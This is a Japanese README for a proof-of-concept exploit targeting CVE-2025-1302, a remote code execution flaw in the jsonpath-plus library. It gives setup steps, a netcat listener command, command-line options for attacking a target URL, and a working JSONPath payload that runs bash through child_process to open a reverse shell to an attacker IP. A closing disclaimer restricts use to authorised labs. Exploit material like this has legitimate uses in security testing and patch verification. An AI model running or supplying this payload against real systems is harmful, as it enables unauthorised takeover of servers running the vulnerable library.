
PoCエクスプロイトとjsonpath-plusのCVE-2025-1302の脆弱なサーバーデモ
PoCスクリプト名: poc.py
CVE-2025-1302用の概念実証エクスプロイトスクリプトで、jsonpath-plusライブラリのRCE脆弱性を標的としています。脆弱なサービスエンドポイントに対して実行されると、スクリプトはJSONPathペイロードを介してリモートコード実行をトリガーし、攻撃者へのリバースシェルを確立しようとします。
--methodまたは--no-fallbackフラグを使用して、POST、GET、またはAUTO(POSTとGETのフォールバック)をサポート。{ip}および{port}テンプレートを使用して、ファイルから1つ以上のJSONPath RCEペイロードテンプレートを読み込み。tqdmプログレスバーを使って遅延とペイロードループを表示。--outputを使用してすべての結果をJSONファイルに保存可能。このリポジトリをクローン:
git clone https://github.com/yourorg/jsonpath-rce-poc.git
cd jsonpath-rce-poc
依存関係をインストール (Python 3.6+が必要):
pip install -r requirements.txt
攻撃マシンでリスナーを起動 (必要に応じてポートを変更):
nc -lvnp 9999
PoCを実行:
python3 poc.py \
--url http://TARGET_HOST:PORT/query \
--ip ATTACKER_IP --port 9999 \
[--payload-file payloads.txt] \
[--delay 5] \
[--method AUTO|POST|GET] \
[--no-fallback] \
[--output results.json]
--payload-file: 各行に1つのJSONPathペイロードを含むファイル。{ip}および{port}プレースホルダを使用。--delay: ペイロード送信前の待機秒数 (カウントダウン表示)。--method: POST、GET、またはAUTO (デフォルト) を強制。--no-fallback: GETリトライをスキップするショートハンド (--method POSTと同等)。--output: 試行のJSONログを保存するパス。$[?(@.constructor.constructor("require(\"child_process\").execSync(\"bash -i >& /dev/tcp/{ip}/{port} 0>&1\")")())]
このスクリプトは、管理されたラボ環境でのみ、所有しているシステムまたは明示的なテスト許可を得たシステムに対して使用してください。悪用は違法かつ非倫理的になる可能性があります。